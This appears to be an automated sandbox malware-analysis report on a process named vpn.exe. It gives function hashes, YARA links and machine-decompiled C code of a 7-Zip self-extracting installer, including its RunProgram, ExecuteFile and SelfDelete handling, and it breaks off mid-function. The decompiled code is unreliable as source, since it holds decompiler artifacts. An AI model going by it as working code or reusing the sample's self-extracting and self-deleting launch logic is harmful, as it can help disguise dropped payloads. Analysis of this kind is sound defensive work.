Instruction Fuzzy Hash: E501B532A4B52276D9323377EC01E6B22055B14728F140B3BF910752F6DABD8C6241DD

Uniqueness

Uniqueness Score: -1.00%

Function 03F5F0ED, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 03F5F13D
_free.LIBCMT ref: 03F5F171

Strings

P.B, xrefs: 03F5F164

Memory Dump Source

Source File: 00000010.00000002.393907435.0000000003F50000.00000040.00000001.sdmp, Offset: 03F50000, based on PE: false

Similarity

API ID: _free
String ID: P.B
API String ID: 269201875-2678322
Opcode ID: bb42c2d98b0f1d5dd7101c848f21f1357e40b6d2e833bc1cc4e40a5a2cacb5ec
Instruction ID: 0944f85a25ad40a96c301b93e0023ba3a6f363e35810f622414b8a309538d22e
Opcode Fuzzy Hash: bb42c2d98b0f1d5dd7101c848f21f1357e40b6d2e833bc1cc4e40a5a2cacb5ec
Instruction Fuzzy Hash: 6901A27BF16722FAC532F624EE00E6B76186B19670F1903A0FF11BE1E4EE5088438196

Uniqueness

Uniqueness Score: -1.00%

Function 004034D4, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E004034D4(intOrPtr* __ecx) {
				intOrPtr* _t3;

				_t3 = __ecx;
				E0040A84A("vector<T> too long");
				asm("int3");
				asm("int3");
				 *_t3 = 0x417944;
				return _t3;
			}

0x004034d4
0x004034d9
0x004034de
0x004034df
0x004034e2
0x004034e8

APIs

std::_Xinvalid_argument.LIBCPMT ref: 004034D9

Part of subcall function 0040A84A: std::invalid_argument::invalid_argument.LIBCONCRT ref: 0040A856

Strings

:>@, xrefs: 004034E2
vector<T> too long, xrefs: 004034D4

Memory Dump Source

Source File: 00000010.00000002.392640756.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Xinvalid_argumentstd::_std::invalid_argument::invalid_argument
String ID: :>@$vector<T> too long
API String ID: 1997705970-1835607025
Opcode ID: 778f7ff508b6a34bfac94ac3a8ac832cdca65a9fcd19edd6faee9dd10402eb77
Instruction ID: ee0235ca3ff9f72fae69fef50acd3c2c7f3314f8c5db612a2fb48719be725a68
Opcode Fuzzy Hash: 778f7ff508b6a34bfac94ac3a8ac832cdca65a9fcd19edd6faee9dd10402eb77
Instruction Fuzzy Hash: 88A012B9A9820802930C3AA44C01640126059013447B054DB62108A950C2BC0055000E

Uniqueness

Uniqueness Score: -1.00%

Function 00401F98, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 2
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00401F98(void* __ecx, char _a4) {
				intOrPtr _v0;
				intOrPtr _v16;
				char _v20;
				char _t19;
				intOrPtr _t20;
				intOrPtr _t21;
				intOrPtr _t28;
				void* _t36;
				void* _t41;
				intOrPtr _t42;
				intOrPtr _t45;
				void* _t48;
				void* _t51;
				void* _t52;
				void* _t56;

				_t36 = __ecx;
				E0040A84A("string too long");
				_t19 = _a4;
				if(_t19 < 0x1000) {
					__eflags = _t19;
					if(_t19 != 0) {
						_t51 = _t56;
						while(1) {
							_t3 =  &_a4; // 0x402ce2
							_push( *_t3);
							_t20 = E0040D785();
							__eflags = _t20;
							if(__eflags != 0) {
								break;
							}
							_t21 = E0040D6FC(__eflags, _a4);
							__eflags = _t21;
							if(_t21 == 0) {
								__eflags = _a4 - 0xffffffff;
								if(_a4 != 0xffffffff) {
									_push(_t51);
									_t51 = _t56;
									_t56 = _t56 - 0xc;
									E00409DC6( &_v20);
									E0040BA54( &_v20, 0x41fa1c);
									asm("int3");
								}
								_push(_t51);
								_t52 = _t56;
								E00409DDE( &_v20);
								E0040BA54( &_v20, 0x41ef7c);
								asm("int3");
								_push(_t52);
								_t41 =  *((intOrPtr*)(_v16 + 0x3c)) + _v16;
								_t45 = _t41 + 0x18 + ( *(_t41 + 0x14) & 0x0000ffff);
								_t48 = ( *(_t41 + 6) & 0x0000ffff) * 0x28 + _t45;
								__eflags = _t45 - _t48;
								if(_t45 == _t48) {
									L18:
									_t28 = 0;
									__eflags = 0;
								} else {
									_t42 = _v0;
									do {
										__eflags = _t42 -  *((intOrPtr*)(_t45 + 0xc));
										if(_t42 <  *((intOrPtr*)(_t45 + 0xc))) {
											goto L17;
										} else {
											__eflags = _t42 -  *((intOrPtr*)(_t45 + 8)) +  *((intOrPtr*)(_t45 + 0xc));
											if(_t42 <  *((intOrPtr*)(_t45 + 8)) +  *((intOrPtr*)(_t45 + 0xc))) {
												_t28 = _t45;
											} else {
												goto L17;
											}
										}
										goto L19;
										L17:
										_t45 = _t45 + 0x28;
										__eflags = _t45 - _t48;
									} while (_t45 != _t48);
									goto L18;
								}
								L19:
								return _t28;
							} else {
								continue;
							}
							goto L21;
						}
						return _t20;
					} else {
						__eflags = 0;
						return 0;
					}
				} else {
					return E00401FC2(_t36, _t19);
				}
				L21:
			}

0x00401f98
0x00401f9d
0x00401fa2
0x00401fab
0x00401fb7
0x00401fb9
0x00409b11
0x00409b22
0x00409b22
0x00409b22
0x00409b25
0x00409b2b
0x00409b2d
0x00000000
0x00000000
0x00409b18
0x00409b1e
0x00409b20
0x00409b31
0x00409b35
0x00409e07
0x00409e08
0x00409e0a
0x00409e10
0x00409e1e
0x00409e23
0x00409e23
0x00409e24
0x00409e25
0x00409e2d
0x00409e3b
0x00409e40
0x00409e41
0x00409e4b
0x00409e54
0x00409e5d
0x00409e5f
0x00409e61
0x00409e7c
0x00409e7c
0x00409e7c
0x00409e63
0x00409e63
0x00409e66
0x00409e66
0x00409e69
0x00000000
0x00409e6b
0x00409e71
0x00409e73
0x00409e81
0x00000000
0x00000000
0x00000000
0x00409e73
0x00000000
0x00409e75
0x00409e75
0x00409e78
0x00409e78
0x00000000
0x00409e66
0x00409e7e
0x00409e80
0x00000000
0x00000000
0x00000000
0x00000000
0x00409b20
0x00409b30
0x00401fbf
0x00401fbf
0x00401fc1
0x00401fc1
0x00401fad
0x00401fb6
0x00401fb6
0x00000000

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00401F9D

Part of subcall function 0040A84A: std::invalid_argument::invalid_argument.LIBCONCRT ref: 0040A856

Strings

,@4, xrefs: 00409B22
string too long, xrefs: 00401F98

Memory Dump Source

Source File: 00000010.00000002.392640756.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Xinvalid_argumentstd::_std::invalid_argument::invalid_argument
String ID: string too long$,@4
API String ID: 1997705970-1487763540
Opcode ID: 68fe97f4ad9fb830ee4a20bfa9087afb70dffb04c2d96bab635505751a863d6a
Instruction ID: 05f60804631a1ba0e770fe5301faf9f6226a4e7485ff2a331192757e02da72de
Opcode Fuzzy Hash: 68fe97f4ad9fb830ee4a20bfa9087afb70dffb04c2d96bab635505751a863d6a
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: vpn.exe PID: 4324 Parent PID: 5520 vpn.exeCOMMON

Executed Functions

Function 004053A7, Relevance: 276.7, APIs: 104, Strings: 53, Instructions: 1998
stringkeyboardwindowCOMMONCrypto

Download Yara Rule

C-Code - Quality: 80%

			E004053A7(WCHAR* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t451;
				signed int _t472;
				short* _t474;
				void* _t475;
				WCHAR* _t476;
				WCHAR* _t477;
				WCHAR* _t480;
				signed int _t481;
				WCHAR* _t485;
				WCHAR* _t487;
				WCHAR* _t488;
				WCHAR* _t491;
				WCHAR* _t496;
				void* _t499;
				signed int _t505;
				signed int _t506;
				WCHAR* _t522;
				WCHAR* _t524;
				WCHAR* _t529;
				WCHAR* _t532;
				signed short _t534;
				WCHAR* _t539;
				int _t540;
				WCHAR* _t541;
				void* _t542;
				WCHAR* _t553;
				WCHAR* _t554;
				WCHAR* _t555;
				WCHAR* _t556;
				WCHAR* _t557;
				WCHAR* _t558;
				WCHAR* _t559;
				WCHAR* _t560;
				WCHAR* _t563;
				WCHAR* _t570;
				WCHAR* _t574;
				WCHAR* _t590;
				long _t593;
				WCHAR* _t596;
				WCHAR* _t609;
				signed int _t617;
				intOrPtr* _t623;
				long _t625;
				WCHAR* _t628;
				WCHAR* _t633;
				signed int _t642;
				WCHAR* _t644;
				WCHAR* _t648;
				WCHAR* _t650;
				WCHAR* _t657;
				WCHAR* _t659;
				signed int _t661;
				WCHAR* _t666;
				WCHAR* _t667;
				void* _t670;
				WCHAR* _t671;
				short _t695;
				WCHAR* _t697;
				WCHAR* _t701;
				WCHAR* _t709;
				WCHAR* _t731;
				WCHAR* _t732;
				WCHAR* _t740;
				WCHAR* _t742;
				WCHAR* _t745;
				WCHAR* _t746;
				WCHAR* _t747;
				WCHAR* _t748;
				signed int _t749;
				WCHAR* _t755;
				WCHAR* _t756;
				WCHAR* _t761;
				signed short* _t762;
				signed short* _t767;
				signed int _t770;
				WCHAR* _t773;
				WCHAR* _t776;
				intOrPtr _t787;
				intOrPtr _t790;
				signed int _t793;
				WCHAR* _t797;
				WCHAR* _t800;
				signed int _t801;
				WCHAR* _t802;
				WCHAR* _t803;
				WCHAR* _t806;
				WCHAR* _t810;
				WCHAR* _t811;
				signed short _t812;
				WCHAR* _t815;
				WCHAR* _t817;
				WCHAR* _t818;
				WCHAR* _t819;
				WCHAR* _t820;
				signed short _t826;
				signed int _t827;
				void* _t828;
				WCHAR* _t830;
				WCHAR* _t831;
				signed int _t832;
				WCHAR* _t834;
				void* _t846;
				void* _t848;
				void* _t863;
				signed int _t884;
				WCHAR** _t890;
				WCHAR* _t921;
				signed int _t961;
				signed int _t963;
				signed char _t965;
				signed int _t966;
				void* _t1007;
				signed int _t1013;
				signed int _t1015;
				signed int _t1017;
				signed short* _t1019;
				signed int _t1023;
				WCHAR* _t1027;
				intOrPtr _t1034;
				signed int _t1039;
				signed int _t1047;
				WCHAR* _t1052;
				void* _t1053;
				WCHAR* _t1058;
				void* _t1059;
				WCHAR** _t1062;
				WCHAR* _t1064;
				signed int _t1069;
				void* _t1070;
				WCHAR* _t1074;
				intOrPtr _t1075;
				WCHAR* _t1076;
				short _t1078;
				void* _t1079;
				WCHAR* _t1080;
				signed short* _t1081;
				WCHAR* _t1082;
				WCHAR* _t1084;
				WCHAR* _t1086;
				WCHAR* _t1089;
				signed short* _t1091;
				unsigned int _t1093;
				signed int _t1095;
				WCHAR** _t1102;
				void* _t1104;
				void* _t1105;
				intOrPtr* _t1110;
				void* _t1112;
				void* _t1114;
				void* _t1115;
				void* _t1116;
				void* _t1117;
				void* _t1118;
				void* _t1119;

				_t1050 = __edx;
				_t1102 = _t1104 - 0x68;
				_t1105 = _t1104 - 0x31c;
				__imp__?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z(E004046E2, _t1053, _t1070, _t828);
				E00402107(__edx); // executed
				 *(_t1102 - 0x2b4) = 0x114;
				if(GetVersionExW(_t1102 - 0x2b4) == 0 ||  *((intOrPtr*)(_t1102 - 0x2a4)) != 2) {
					L384:
					MessageBoxA(0, "Sorry, this program requires Microsoft Windows 2000 or later.", "7-Zip SFX", 0x10);
					_t451 = 0x14;
					goto L385;
				} else {
					_t1146 =  *((intOrPtr*)(_t1102 - 0x2b0)) - 5;
					if( *((intOrPtr*)(_t1102 - 0x2b0)) < 5) {
						goto L384;
					}
					 *(_t1102 - 0x48) =  *(_t1102 - 0x48) | 0xffffffff;
					 *(_t1102 - 0x44) =  *(_t1102 - 0x44) | 0xffffffff;
					";!@InstallEnd@!" = 0x3b;
					";!@Install@!UTF-8!" = 0x3b;
					_t1102[0xe] = 0x41b8d4;
					_t1102[0x19] = 0;
					_t1102[0x19] = 0;
					_t1102[0x17] = 0;
					_t1102[0x19] = 0;
					E00410F2D(E00410F2D(_t449,  &(_t1102[5])), _t1102 - 0x6c);
					_t1102[0x13] = 0;
					_t1102[0x14] = 0;
					_t1102[0x15] = 0;
					E00403F58(_t1050); // executed
					E00411362(_t1102 - 0x60, _t1050, _t1146, " ");
					E004113E9(_t1102 - 0x60, _t1146, E004042CA(GetCommandLineW(),  &(_t1102[5])));
					E004032EC(_t1053, _t1146, _t1102 - 0x60);
					_t830 =  *(_t1102 - 0x60);
					_t1102[0x12] = _t830;
					 *(_t1102 - 0x18) =  &(_t830[lstrlenW(_t830)]);
					E00403B4F(_t830, _t1050, _t1146, L"SfxVarModulePlatform", L"x86", 1);
					E00403B4F(_t830, _t1050, _t1146, L"SfxVarSystemPlatform", E004027B8(_t1146), 1); // executed
					E00403B4F(_t830, _t1050, _t1146, L"SfxVarCmdLine0", GetCommandLineW(), 1);
					wsprintfW(E00403001( &(_t1102[5]), _t1146, 0x20), L"%d",  *0x41e6e4 & 0x0000ffff);
					_t1074 = _t1102[5];
					_t472 = E00401D03(_t1074);
					_t844 = 0;
					_t1102[6] = _t472;
					_t1074[_t472] = 0;
					E00403B4F(_t830, _t1050, _t1146, L"SfxVarSystemLanguage", _t1102[5], 1);
					_t474 = E004043AC(0, _t830, L"sfxlang");
					_t1110 = _t1105 + 0x48;
					if(_t474 == 0 ||  *_t474 != 0x3a) {
						L12:
						_t475 = E004043AC(_t844, _t830, L"sfxversion");
						_pop(_t846);
						_t1152 = _t475;
						if(_t475 == 0) {
							_t476 = E004043AC(_t846, _t830, L"sfxwaitall");
							_pop(_t848);
							__eflags = _t476;
							if(_t476 == 0) {
								_t1102[0x19] = 0;
								_t477 = E004043AC(_t848, _t830, L"sfxelevation");
								__eflags = _t477;
								if(__eflags == 0) {
									L24:
									_t480 = GetModuleFileNameW(0, E00403001(0x41e79c, __eflags, 0x208), 0x208);
									__eflags = _t480;
									if(_t480 != 0) {
										_t1075 =  *0x41e79c; // 0x2ec2488
										_t481 = E00401D03(_t1075);
										 *0x41e7a0 = _t481;
										 *_t1110 = L"sfxtest";
										_push(_t830);
										 *((short*)(_t1075 + _t481 * 2)) = 0;
										_t1076 = E004043AC(0);
										__eflags = _t1076;
										if(_t1076 == 0) {
											L77:
											E00410F79(_t830, 0x41e760, 0x41e79c);
											E00410F79(_t830, 0x41e76c, 0x41e79c);
											_t485 = E004020E4(__eflags, 0x41e79c);
											_t1078 = 0;
											__eflags = _t485;
											if(__eflags >= 0) {
												_t1027 =  *0x41e760; // 0x9de9d8
												 *0x41e764 = _t485;
												 *((short*)(_t485 + _t485 + _t1027)) = 0;
												_t787 =  *0x41e79c; // 0x2ec2488
												_t60 = _t787 + 2; // 0x2
												E00411391(_t830, 0x41e76c, _t485 + _t485 + _t60);
												_t790 =  *0x41e79c; // 0x2ec2488
												_t62 = _t790 + 2; // 0x2
												E00411391(_t830, 0x41e784, _t485 + _t485 + _t62);
												_t793 = E00411077(0x41e784, 0x2e);
												__eflags = _t793;
												if(_t793 > 0) {
													_t1050 =  *0x41e784; // 0x9d5c90
													__eflags = 0;
													 *0x41e788 = _t793;
													_t1050[_t793] = 0;
												}
												E00410F79(_t830, 0x41e778, 0x41e784);
												E004113E9(0x41e778, __eflags, E004025A3(4));
												_t797 =  *0x41e784; // 0x9d5c90
												_t1034 =  *0x41e778; // 0x2ec0a38
												 *0x41e718 = _t797;
												 *0x41e720 = _t1034;
												 *0x41e724 = _t797;
												_t1078 = 0;
												__eflags = 0;
											}
											_t487 = E00411391(_t830, 0x41e790, E004027B8(__eflags));
											_push(0x28);
											L00418686();
											__eflags = _t487 - _t1078;
											if(_t487 == _t1078) {
												_t1058 = 0;
												__eflags = 0;
												_t1102[0x16] = 0;
											} else {
												_t487[2] = _t1078;
												_t487[0xe] = _t1078;
												_t487[0x10] = _t1078;
												_t487[0x12] = _t1078;
												 *_t487 = 0x41b9f8;
												_t1058 = _t487;
												_t1102[0x16] = _t487;
											}
											__eflags = _t1058 - _t1078;
											if(__eflags != 0) {
												 *((intOrPtr*)( *_t1058 + 4))(_t1058);
											}
											_t488 = E00409491(_t1058, _t1050, __eflags,  *0x41e79c); // executed
											__eflags = _t488;
											if(_t488 != 0) {
												E00410D41(_t488,  &(_t1102[0xf]));
												_t491 = E00402DC0(__eflags, _t1058,  &(_t1102[0xf])); // executed
												_pop(_t863);
												__eflags = _t491;
												if(_t491 != 0) {
													__eflags =  *0x41e7e4 - _t1078; // 0x0
													if(__eflags != 0) {
														L109:
														_t864 =  &(_t1102[0x13]);
														E0040524A(_t491,  &(_t1102[0x13]));
														__eflags = _t1102[0x10] - _t1078;
														if(__eflags == 0) {
															L112:
															__eflags =  *0x41e7e4 - 4;
															if( *0x41e7e4 == 4) {
																L107:
																_push(_t1102[0xf]);
																L00418674();
																__eflags = _t1058 - _t1078;
																if(_t1058 != _t1078) {
																	 *((intOrPtr*)( *_t1058 + 8))(_t1058);
																}
																goto L14;
															}
															_t496 =  *0x41e0a0; // 0x1
															_t1080 = 0x41e0a0;
															while(1) {
																__eflags = _t496;
																if(__eflags == 0) {
																	break;
																}
																wsprintfW(_t1102 - 0xc4, L"SfxString%d", _t496);
																_t499 = E004025A3( *_t1080);
																_t864 = 0;
																_push(_t499);
																_push(_t1102 - 0xc4); // executed
																E00403B4F(_t830, _t1050, __eflags); // executed
																_t1110 = _t1110 + 0x18;
																_t1080 =  &(_t1080[8]);
																__eflags = _t1080;
																_t496 =  *_t1080;
															}
															E00404422(_t864, _t1050, __eflags,  &(_t1102[0x13]));
															_t831 = _t830 - 2;
															__eflags = _t831;
															_t1102[0x18] = _t831;
															E00403B4F(_t831, _t1050, _t831, L"SfxVarCmdLine2", 0x41a650, 1);
															_t1112 = _t1110 + 0x10;
															_t1059 = 0x30;
															while(1) {
																__eflags =  *_t831 - 0x20;
																if( *_t831 <= 0x20) {
																	goto L123;
																}
																do {
																	L118:
																	_t831 =  &(_t831[1]);
																	__eflags =  *_t831 - 0x20;
																} while ( *_t831 > 0x20);
																L122:
																_t1102[0x18] = _t831;
																L123:
																_t505 =  *_t831 & 0x0000ffff;
																__eflags = _t505;
																if(_t505 != 0) {
																	__eflags = _t505 - 0x20;
																	if(_t505 > 0x20) {
																		goto L124;
																	}
																	_t831 =  &(_t831[1]);
																	__eflags = _t831;
																	goto L122;
																}
																L124:
																_t506 =  *_t831 & 0x0000ffff;
																__eflags = _t506 - 0x2f;
																if(_t506 == 0x2f) {
																	L126:
																	_t92 =  &(_t831[1]); // -2
																	_t1081 = _t92;
																	__eflags =  *_t1081 - 0x21;
																	if( *_t1081 == 0x21) {
																		_t1082 = _t831;
																		_t831 =  &(_t831[2]);
																		_t1102[0x18] = _t831;
																		__eflags = _t1082;
																		if(_t1082 != 0) {
																			L181:
																			__eflags = _t1102[0x12] - _t1082;
																			if(__eflags == 0) {
																				_push(1);
																				_push(0x41a650);
																			} else {
																				E00411362( &(_t1102[2]), _t1050, __eflags, _t1102[0x12]);
																				E00410EB5(_t1102 - 0x10, _t1050, _t1082 - _t1102[0x12] >> 1,  &(_t1102[2]));
																				E00411391(_t831,  &(_t1102[5]),  *((intOrPtr*)(_t1102 - 0x10)));
																				_push( *((intOrPtr*)(_t1102 - 0x10)));
																				L00418674();
																				_push(_t1102[2]);
																				L00418674();
																				E004110A3( &(_t1102[5]));
																				E00411424( &(_t1102[5]));
																				_push(1);
																				_push(_t1102[5]);
																			}
																			_push(L"SfxVarCmdLine1");
																			E00403B4F(_t831, _t1050, __eflags);
																			E00411362( &(_t1102[2]), _t1050, __eflags, _t831);
																			E00410EB5(_t1102 - 0x10, _t1050,  *(_t1102 - 0x18) - _t831 >> 1,  &(_t1102[2]));
																			E00411391(_t831,  &(_t1102[5]),  *((intOrPtr*)(_t1102 - 0x10)));
																			_push( *((intOrPtr*)(_t1102 - 0x10)));
																			L00418674();
																			_push(_t1102[2]);
																			L00418674();
																			E004110A3( &(_t1102[5]));
																			_t876 =  &(_t1102[5]);
																			E00411424( &(_t1102[5]));
																			E00403B4F(_t831, _t1050, __eflags, L"SfxVarCmdLine2", _t1102[5], 1); // executed
																			E00404422( &(_t1102[5]), _t1050, __eflags,  &(_t1102[0x13]));
																			_t1114 = _t1112 + 0x1c;
																			__eflags = _t1102[0x19];
																			if(_t1102[0x19] != 0) {
																				L197:
																				 *(_t1102 - 0x14) =  *(_t1102 - 0x14) & 0x00000000;
																				_t1060 = L"SetEnvironment";
																				_t522 = E004033FF( &(_t1102[0x13]), L"SetEnvironment", _t1102 - 0x14);
																				_t1115 = _t1114 + 0xc;
																				while(1) {
																					_t1083 = _t522;
																					__eflags = _t522;
																					if(__eflags == 0) {
																						break;
																					}
																					E00411362(_t1102 - 4, _t1050, __eflags, _t1083);
																					_t524 = E00410BDC( *(_t1102 - 4), 0x3d);
																					__eflags = _t524;
																					if(__eflags <= 0) {
																						_push( *(_t1102 - 4));
																						L00418674();
																						_pop(_t876); // executed
																						L203:
																						E00404EE2(_t831); // executed
																						__eflags =  *0x41e394 - 0xffffffff;
																						if( *0x41e394 == 0xffffffff) {
																							 *0x41e394 = 0;
																						}
																						__eflags = _t1102[0x19];
																						if(_t1102[0x19] == 0) {
																							__eflags = _t1102[0x19];
																							if(_t1102[0x19] != 0) {
																								 *0x41e394 =  *0x41e394 & 0xfffffeff;
																								__eflags =  *0x41e394;
																							}
																							__imp__CoInitialize(0);
																							_t1084 = E004033FF( &(_t1102[0x13]), L"SfxAuthor", 0);
																							_t1116 = _t1115 + 0xc;
																							__eflags = _t1084;
																							if(_t1084 == 0) {
																								L223:
																								_t529 = E004033FF( &(_t1102[0x13]), L"InstallPath", 0);
																								_t1117 = _t1116 + 0xc;
																								_t1062 = 0x41e754;
																								__eflags = _t529;
																								if(__eflags != 0) {
																									_t876 = 0x41e754;
																									E00411391(_t831, 0x41e754, _t529);
																								}
																								E00404057(_t831, _t1050, __eflags, _t1062);
																								_t532 = E004033FF( &(_t1102[0x13]), L"BeginPromptTimeout", 0);
																								_t1118 = _t1117 + 0x10;
																								__eflags = _t532;
																								if(_t532 != 0) {
																									__imp___wtol();
																									_t876 = _t532;
																									 *0x41e740 = _t532;
																								}
																								__eflags =  *0x41e7ec; // 0x0
																								if(__eflags == 0) {
																									__eflags =  *0x41e7e4 - 3;
																									if(__eflags != 0) {
																										__eflags =  *0x41e734 & 0x00000008;
																										_t1086 = _t1102[0x16];
																										if(( *0x41e734 & 0x00000008) != 0) {
																											while(1) {
																												L238:
																												_t534 = E004033FF( &(_t1102[0x13]), L"BeginPrompt", 0);
																												_t1118 = _t1118 + 0xc;
																												__eflags = _t534;
																												if(_t534 == 0) {
																													goto L245;
																												}
																												__eflags = _t1102[0x19];
																												if(_t1102[0x19] != 0) {
																													goto L245;
																												}
																												_t666 = E00408B95(_t831, _t1050,  *0x41e718, _t534);
																												__eflags = _t666;
																												if(_t666 == 0) {
																													_push(_t1102[0xf]);
																													L00418674();
																													L268:
																													L235:
																													__eflags = _t1086;
																													if(_t1086 != 0) {
																														 *((intOrPtr*)( *_t1086 + 8))(_t1086);
																													}
																													_push(5);
																													goto L30;
																												}
																												_t534 = GetKeyState(0x10);
																												__eflags = 0x00008000 & _t534;
																												if((0x00008000 & _t534) != 0) {
																													_t1102[0x19] = 1;
																													_t1102[0x19] = 1;
																												}
																												__eflags =  *0x41e7cc;
																												if( *0x41e7cc != 0) {
																													 *0x41e394 =  *0x41e394 & 0xffffff7f;
																													__eflags =  *0x41e394;
																												}
																												L245:
																												_t880 =  &(_t1102[0xb]);
																												E00410F2D(_t534,  &(_t1102[0xb]));
																												__eflags = _t1102[0x19];
																												if(_t1102[0x19] == 0) {
																													L255:
																													__eflags = _t1102[0xc];
																													_t1102[0x19] = 0;
																													if(_t1102[0xc] == 0) {
																														_t648 = E004033FF( &(_t1102[0x13]), L"ExecuteFile", 0);
																														_t1118 = _t1118 + 0xc;
																														__eflags = _t648;
																														if(_t648 != 0) {
																															_t880 =  &(_t1102[0xb]);
																															E00411391(_t831,  &(_t1102[0xb]), L"ExecuteFile");
																															_t1102[0x19] = 1;
																														}
																														__eflags = _t1102[0xc];
																														if(_t1102[0xc] == 0) {
																															_t650 = E004033FF( &(_t1102[0x13]), L"RunProgram", 0);
																															_t1118 = _t1118 + 0xc;
																															__eflags = _t650;
																															if(_t650 != 0) {
																																_t880 =  &(_t1102[0xb]);
																																E00411391(_t831,  &(_t1102[0xb]), L"RunProgram");
																															}
																														}
																													}
																													__eflags = _t1102[0x19];
																													if(_t1102[0x19] != 0) {
																														L273:
																														__eflags =  *0x41e758;
																														if(__eflags != 0) {
																															E00410F51( &(_t1102[2]), _t1050, __eflags, _t1062);
																															E00404057(_t831, _t1050, __eflags,  &(_t1102[2]));
																															__eflags = _t1102[3];
																															if(_t1102[3] != 0) {
																																E00410F79(_t831, _t1062,  &(_t1102[2]));
																															}
																															_push(_t1102[2]);
																															 *0x41e6fc = 1;
																															L00418674();
																														} else {
																															E00410F79(_t831, _t1062, E00404E30(_t880, __eflags, _t1102 - 0x10, L"7ZipSfx.%03x"));
																															_push( *((intOrPtr*)(_t1102 - 0x10)));
																															L00418674();
																															 *0x41e6fc = 0;
																														}
																														_t539 =  *0x41e754; // 0x2ec5520
																														_t884 =  *0x41e758; // 0x32
																														_t303 = _t884 * 2; // 0x430a01
																														_t1051 =  *(_t539 + _t303 - 2) & 0x0000ffff;
																														__eflags = _t1051 - 0x5c;
																														if(_t1051 == 0x5c) {
																															L280:
																															_t884 = _t884 - 1;
																															_t1051 = 0;
																															__eflags = 0;
																															 *0x41e758 = _t884;
																															_t539[_t884] = 0;
																															_t539 =  *0x41e754; // 0x2ec5520
																															goto L281;
																														} else {
																															__eflags = _t1051 - 0x2f;
																															if(_t1051 != 0x2f) {
																																L281:
																																_t540 = SetCurrentDirectoryW(_t539); // executed
																																__eflags = _t1102[0x19];
																																if(_t1102[0x19] != 0) {
																																	 *0x41e734 =  *0x41e734 | 0x00000003;
																																	__eflags =  *0x41e734;
																																}
																																__eflags =  *0x41e7e0;
																																if( *0x41e7e0 != 0) {
																																	_t541 = E00408C7F(_t831, _t1051);
																																	__eflags = _t541;
																																	if(_t541 != 0) {
																																		goto L291;
																																	}
																																	_t633 = 0x80004005;
																																	goto L287;
																																} else {
																																	_t633 = E00401BDC(_t540, _t884, _t1051, _t1086, _t1062); // executed
																																	L287:
																																	__eflags = _t633;
																																	if(_t633 == 0) {
																																		L291:
																																		_t542 = E00404EE2(_t831);
																																		__eflags = _t1102[0x17];
																																		if(_t1102[0x17] == 0) {
																																			L293:
																																			_t1102[0x12] = _t1102[0x12] & 0x00000000;
																																			E00410F2D(_t542, _t1102 - 4);
																																			__eflags = _t1102[0x19];
																																			if(__eflags == 0) {
																																				E00404276(_t831, _t1051, __eflags,  &(_t1102[0x13]), _t1102 - 4);
																																			}
																																			_t544 = _t1102[0xe];
																																			_t1102[0x19] = 0;
																																			 *(_t1102 - 0x18) = _t1102[0xe];
																																			while(1) {
																																				_t1087 = 0;
																																				 *(_t1102 - 0x28) = 0;
																																				_t1102[0x19] = 0;
																																				E00410F2D(E00410F2D(_t544,  &(_t1102[8])), _t1102 - 0x24);
																																				_t1102[0x18] = 0;
																																				__eflags = _t1102[0xc];
																																				if(_t1102[0xc] == 0) {
																																				}
																																				L297:
																																				__eflags =  *0x41e6fc;
																																				if( *0x41e6fc != 0) {
																																					L356:
																																					_push( *(_t1102 - 0x24));
																																					L00418674();
																																					_push(_t1102[8]);
																																					L00418674();
																																					L365:
																																					__eflags =  *0x41e7e4;
																																					if( *0x41e7e4 == 0) {
																																						E00404EE2(_t831);
																																						E0040489C(__eflags, E00404F39,  &(_t1102[0x13]), L"Shortcut", _t1102[0xe],  *(_t1102 - 0x48));
																																						SetCurrentDirectoryW( *0x41e760); // executed
																																						E0040489C(__eflags, E0040486D,  &(_t1102[0x13]), L"Delete", _t1102[0xe],  *(_t1102 - 0x44));
																																						_t1118 = _t1118 + 0x28;
																																						E004046CC();
																																					}
																																					_push( *(_t1102 - 4));
																																					L00418674();
																																					L368:
																																					__eflags =  *0x41e3a0 - 0xffffffff;
																																					if( *0x41e3a0 != 0xffffffff) {
																																						L371:
																																						__eflags =  *0x41e3a0;
																																						if( *0x41e3a0 > 0) {
																																							_t1087 = E004033FF( &(_t1102[0x13]), L"FinishMessage", 0);
																																							_t1118 = _t1118 + 0xc;
																																							__eflags = _t1087;
																																							if(_t1087 != 0) {
																																								__eflags =  *0x41e3a0 - 0x3e7; // 0x1
																																								if(__eflags > 0) {
																																									 *0x41e3a0 = 0x3e7;
																																								}
																																								E0040796C(_t1102 - 0xbc, _t1051, __eflags);
																																								 *((intOrPtr*)(_t1102 - 0xbc)) = 0x41b7d4;
																																								 *((intOrPtr*)(_t1102 - 0x84)) = 0x7d5;
																																								E004079CD(E00407BC7(_t831, _t1102 - 0xbc, 0x11,  *0x41e718, _t1087, 0), _t1102 - 0xbc);
																																							}
																																						}
																																						L376:
																																						__eflags = _t1102[0x17];
																																						if(_t1102[0x17] == 0) {
																																							__eflags =  *0x41e7e4;
																																							if( *0x41e7e4 == 0) {
																																								_t574 = E004033FF( &(_t1102[0x13]), L"SelfDelete", 0);
																																								_t1119 = _t1118 + 0xc;
																																								__eflags = _t574;
																																								if(_t574 != 0) {
																																									__eflags =  *_t574 - 0x31;
																																									if(__eflags == 0) {
																																										E00410F51(_t1119 - 0xc, _t1051, __eflags, 0x41e79c);
																																										E00405016(_t1087);
																																									}
																																								}
																																							}
																																						}
																																						_push(_t1102[0xb]);
																																						L00418674();
																																						_push(_t1102[0xf]);
																																						L00418674();
																																						_t570 = _t1102[0x16];
																																						__eflags = _t570;
																																						if(_t570 != 0) {
																																							 *((intOrPtr*)( *_t570 + 8))(_t570);
																																						}
																																						_push( *(_t1102 - 0x60));
																																						L00418674();
																																						E00405221( &(_t1102[0x13]));
																																						_push( *((intOrPtr*)(_t1102 - 0x6c)));
																																						L00418674();
																																						_push(_t1102[5]);
																																						L00418674();
